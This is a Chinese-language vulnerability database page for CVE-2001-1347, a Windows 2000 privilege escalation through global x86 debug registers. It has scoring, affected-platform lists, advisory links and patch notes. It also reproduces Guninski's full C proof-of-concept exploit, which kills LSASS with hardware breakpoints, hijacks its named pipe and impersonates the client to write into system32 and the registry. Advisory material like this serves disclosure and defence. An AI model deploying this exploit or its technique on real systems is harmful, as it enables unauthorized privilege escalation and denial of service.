CVE-2001-1347
CVSS4.6
发布时间 :2001-05-24 00:00:00
修订时间 :2008-09-05 16:26:19
NMCOES    

[原文]Windows 2000 allows local users to cause a denial of service and possibly gain privileges by setting a hardware breakpoint that is handled using global debug registers, which could cause other processes to terminate due to an exception, and allow hijacking of resources such as named pipes.


[CNNVD]微软Win2K通过调试寄存器提升权限漏洞(CNNVD-200105-095)

        CVE(CAN) ID: CAN-2001-1347
        
        
        
        如果某人能够在目标Win2K系统上执行程序,则他可以提升自己的权限,至少他可以使自己对%SystemRoot%\system32目录和注册表中的HKEY_CLASSES_ROOT分支有写访问权限。
        
        
        
        这是因为x86调试寄存器DR0~DR7对于所有进程来说是全局性的。因此在一个进程中所设的硬件断点会影响其它的进程和服务。如果该断点在某个服务中被触发,就会引发一个单步异常,该进程/服务就会被终止。该服务被终止后,就有可能劫持其受信任的命名管道,当另一个服务向这个命名管道写入时,就有可能冒充该服务。
        
        
        
        <* 来源:Georgi Guninski(guninski@guninski.com)*>
        
        
        
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1347
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1347
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-095
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2764
(VENDOR_ADVISORY)  BID  2764
http://www.iss.net/security_center/static/6590.php
(VENDOR_ADVISORY)  XF  win2k-debug-elevate-privileges(6590)
http://archives.neohapsis.com/archives/bugtraq/2001-05/0232.html
(UNKNOWN)  BUGTRAQ  20010524 Elevation of privileges with debug registers on Win2K

- 漏洞信息

微软Win2K通过调试寄存器提升权限漏洞
中危 设计错误
2001-05-24 00:00:00 2005-05-13 00:00:00
本地  
        CVE(CAN) ID: CAN-2001-1347
        
        
        
        如果某人能够在目标Win2K系统上执行程序,则他可以提升自己的权限,至少他可以使自己对%SystemRoot%\system32目录和注册表中的HKEY_CLASSES_ROOT分支有写访问权限。
        
        
        
        这是因为x86调试寄存器DR0~DR7对于所有进程来说是全局性的。因此在一个进程中所设的硬件断点会影响其它的进程和服务。如果该断点在某个服务中被触发,就会引发一个单步异常,该进程/服务就会被终止。该服务被终止后,就有可能劫持其受信任的命名管道,当另一个服务向这个命名管道写入时,就有可能冒充该服务。
        
        
        
        <* 来源:Georgi Guninski(guninski@guninski.com)*>
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
        微软宣称Win2K SP2中已解决本问题,但目前尚未得到证实。
        
        
        
        微软SP2下载地址:
        
        
        http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/default.asp

        
        
        

- 漏洞信息 (20880)

MS Windows 2000 Debug Registers Vulnerability (EDBID:20880)
windows local
2001-05-24 Verified
0 Georgi Guninski
N/A [点击下载]
source: http://www.securityfocus.com/bid/2764/info

A vulnerability exists in the handling of debug registers in Windows 2000.

It is possible for unprivileged processes to create breakpoints for arbitrary processes. This can be used to 'kill' arbitrary processes without administrative privileges.

Since it is possible for an unprivileged process to terminate arbitrary processes, depending on the programs involved, this vulnerability could be used to leverage other attacks. Including a denial of service or elevating privileges by 'impersonating' a trusted named pipe. 

// Win2K elevation of privileges
// Written by Georgi Guninski http://www.guninski.com
// Kind of ugly but works
// Check the disclaimer and advisory at http://www.guninski.com/dr07.html

#define _WIN32_WINNT  0x0500

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>

// may need to change below
///////////////////////////////
DWORD lsasspid=224; // pid of LSASS.EXE
//DWORD lsasspid=236; // pid of LSASS.EXE
DWORD MAGICESPINLSA=0x0053ffa0; // ESP in LSASS.EXE - may need to change it
//////////////////////////////

char szPipe[64]="\\\\.\\pipe\\lsass";
HANDLE hProc = NULL;
PROCESS_INFORMATION pi;


volatile int lsadied = 0;



unsigned long __stdcall threadlock(void *v)
{   
	Sleep(1000);
	LockWorkStation();
	return 0;
}

unsigned long __stdcall threadwriter(void *v)
{
	while(!lsadied)
	{
    FILE *f1;
	f1=fopen("\\\\.\\pipe\\lsass","a");
	 if (f1 != NULL)
		{
		 fprintf(f1,"A");
		 fclose(f1);
		}
/*
	 else
		 printf("%s\n","error writing to pipe");
*/
	Sleep(400);
	}
	printf("%s\n","Stop writing to pipe");
	return 0;
}

unsigned long __stdcall waitlsadie(void *v)
{

int lsadied2=0;
long ( __stdcall *NtQuerySystemInformation )( ULONG, PVOID, ULONG, ULONG ) = NULL;
if ( !NtQuerySystemInformation )
      NtQuerySystemInformation = ( long ( __stdcall * )( ULONG, PVOID, ULONG,
ULONG ) ) GetProcAddress( GetModuleHandle( "ntdll.dll" ),"NtQuerySystemInformation" );
typedef struct _tagThreadInfo
{
        FILETIME ftCreationTime;
        DWORD dwUnknown1;
        DWORD dwStartAddress;
        DWORD dwOwningPID;
        DWORD dwThreadID;
        DWORD dwCurrentPriority;
        DWORD dwBasePriority;
        DWORD dwContextSwitches;
        DWORD dwThreadState;
          DWORD dwWaitReason;
        DWORD dwUnknown2[ 5 ];
} THREADINFO, *PTHREADINFO;
#pragma warning( disable:4200 )
typedef struct _tagProcessInfo
{
        DWORD dwOffset;
        DWORD dwThreadCount;
        DWORD dwUnknown1[ 6 ];
        FILETIME ftCreationTime;
        DWORD dwUnknown2[ 5 ];
        WCHAR* pszProcessName;
        DWORD dwBasePriority;
        DWORD dwProcessID;
        DWORD dwParentProcessID;
        DWORD dwHandleCount;
        DWORD dwUnknown3;
        DWORD dwUnknown4;
        DWORD dwVirtualBytesPeak;
        DWORD dwVirtualBytes;
        DWORD dwPageFaults;
        DWORD dwWorkingSetPeak;
        DWORD dwWorkingSet;
        DWORD dwUnknown5;
        DWORD dwPagedPool;
        DWORD dwUnknown6;
        DWORD dwNonPagedPool;
        DWORD dwPageFileBytesPeak;
        DWORD dwPrivateBytes;
        DWORD dwPageFileBytes;
        DWORD dwUnknown7[ 4 ];
        THREADINFO ti[ 0 ];
} _PROCESSINFO, *PPROCESSINFO;
#pragma warning( default:4200 )



 PBYTE pbyInfo = NULL;
 DWORD cInfoSize = 0x20000;
while(!lsadied2)
{
 pbyInfo = ( PBYTE ) malloc( cInfoSize );
 NtQuerySystemInformation( 5, pbyInfo, cInfoSize, 0 ) ;
 PPROCESSINFO pProcessInfo = ( PPROCESSINFO ) pbyInfo;
 bool bLast = false;
 lsadied2 = 1;
 do {
	 if ( pProcessInfo->dwOffset == 0 )
         bLast = true;
     if (pProcessInfo->dwProcessID == lsasspid)
		 lsadied2 = 0 ;
     pProcessInfo = ( PPROCESSINFO ) ( ( PBYTE ) pProcessInfo + pProcessInfo->dwOffset );
    } while( bLast == false );
 free( pbyInfo );
}
printf("LSA died!\n");
lsadied=1;
return 0;
}



void add_thread(HANDLE thread)
{
		  CONTEXT ctx = {CONTEXT_DEBUG_REGISTERS};

//DR7=d0000540 DR6=ffff0ff0 DR3=53ffa0 DR2=0 DR1=0 DR0=0

    SuspendThread(thread);
    GetThreadContext(thread,&ctx);
	ctx.Dr7=0xd0000540;
	ctx.Dr6=0xffff0ff0;
	ctx.Dr3=MAGICESPINLSA;
	ctx.Dr2=0;
	ctx.Dr1=0;
	ctx.Dr0=0;
    SetThreadContext(thread, &ctx);
    ResumeThread(thread);
//    printf("DR7=%x DR6=%x DR3=%x DR2=%x DR1=%x DR0=%x\n",ctx.Dr7,ctx.Dr6,ctx.Dr3,ctx.Dr2,ctx.Dr1,ctx.Dr0);

}


unsigned long __stdcall threaddeb(void *v)
{
    STARTUPINFO si = {
        sizeof(STARTUPINFO)
    };


    CreateProcess(0,"c:\\winnt\\system32\\taskmgr.exe",0,0,0,
		CREATE_NEW_CONSOLE,0,0,&si,&pi);
	Sleep(2000);
    BOOL status = CreateProcess(
        0,
        "c:\\winnt\\system32\\calc.exe",
        0,0,0,
		DEBUG_PROCESS
        | DEBUG_ONLY_THIS_PROCESS
        | CREATE_NEW_CONSOLE,
        0,0,&si,&pi);

    if( !status )
    {
		printf("%s\n","error debugging");
		exit(1);
    }

    add_thread(pi.hThread);

    for( ;; )
    {
        DEBUG_EVENT de;
        if( !WaitForDebugEvent(&de, INFINITE) )
        {
		 printf("%s\n","error WaitForDebugEvent");
        }

        switch( de.dwDebugEventCode )
        {
        case CREATE_THREAD_DEBUG_EVENT:
            add_thread(de.u.CreateThread.hThread);
            break;
        }
    ContinueDebugEvent(de.dwProcessId,de.dwThreadId,DBG_CONTINUE);
	}

	return 0;
}

    int main(int argc,char* argv[])
    {
      DWORD dwType = REG_DWORD;
      DWORD dwSize = sizeof(DWORD);
	  DWORD dwNumber = 0;
      char szUser[256];

	exit(0);
      HANDLE hPipe = 0;

		if (argc > 1)
			lsasspid=atoi(argv[1]);
		if (argc > 2)
			sscanf(argv[2],"%x",&MAGICESPINLSA);

	  printf("Fun with debug registers. Written by Georgi Guninski\n");
	  printf("vvdr started: lsasspid=%d breakp=%x\n",lsasspid,MAGICESPINLSA);
   	  CreateThread(0, 0, &threadwriter, NULL, 0, 0);
	  CreateThread(0, 0, &waitlsadie, NULL, 0, 0);
	  CreateThread(0, 0, &threaddeb, NULL, 0, 0);

  	  while(!lsadied);

      printf("start %s\n",szPipe);
      hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                               PIPE_TYPE_MESSAGE|PIPE_WAIT,
                               2, 0, 0, 0, NULL);
      if (hPipe == INVALID_HANDLE_VALUE)
      {
        printf ("Failed to create named pipe:\n  %s\n", szPipe);
        return 3;
      }
	  CreateThread(0, 0, &threadlock, NULL, 0, 0);
	  ConnectNamedPipe (hPipe, NULL);
      if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, NULL))
      {
        printf ("Failed to read the named pipe.\n");
        CloseHandle(hPipe);
        return 4;
      }

     if (!ImpersonateNamedPipeClient (hPipe))
      {
        printf ("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
      }
      dwSize  = 256;
      GetUserName(szUser, &dwSize);
      printf ("Impersonating dummy :) : %s\n\n\n\n", szUser);
// the action begins
	  FILE *f1;
	  f1=fopen("c:\\winnt\\system32\\vv1.vv","a");
		if (f1 != NULL)
		{
		 fprintf(f1,"lsass worked\n");
		 fclose(f1);
		 printf("\n%s\n","Done!");
		}
		else
		 printf("error creating file");
	fflush(stdout);
	HKEY mykey;
	RegCreateKey(HKEY_CLASSES_ROOT,"vv",&mykey);
	RegCloseKey(mykey);


    CloseHandle(hPipe);
    return 0;
    }
		

- 漏洞信息

13437
Microsoft Windows 2000 Debug Register Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-05-24 Unknow
2001-05-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

MS Windows 2000 Debug Registers Vulnerability
Design Error 2764
No Yes
2001-05-24 12:00:00 2009-07-11 06:06:00
Discovered and posted to Bugtraq by Georgi Guninski <guninski@guninski.com> on May 24, 2001.

- 受影响的程序版本

Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Advanced Server SP2

- 不受影响的程序版本

Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Advanced Server SP2

- 漏洞讨论

A vulnerability exists in the handling of debug registers in Windows 2000.

It is possible for unprivileged processes to create breakpoints for arbitrary processes. This can be used to 'kill' arbitrary processes without administrative privileges.

Since it is possible for an unprivileged process to terminate arbitrary processes, depending on the programs involved, this vulnerability could be used to leverage other attacks. Including a denial of service or elevating privileges by 'impersonating' a trusted named pipe.

- 漏洞利用

Georgi Guninski &lt;guninski@guninski.com&gt; has provided the following exploit:

http://www.guninski.com/pipe3.cpp

- 解决方案

Microsoft has reported that Windows 2000 SP2 is not affected by this vulnerability.


Microsoft Windows 2000 Professional

Microsoft Windows 2000 Advanced Server SP1

Microsoft Windows 2000 Server SP1

Microsoft Windows 2000 Advanced Server

Microsoft Windows 2000 Professional SP1

Microsoft Windows 2000 Server

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站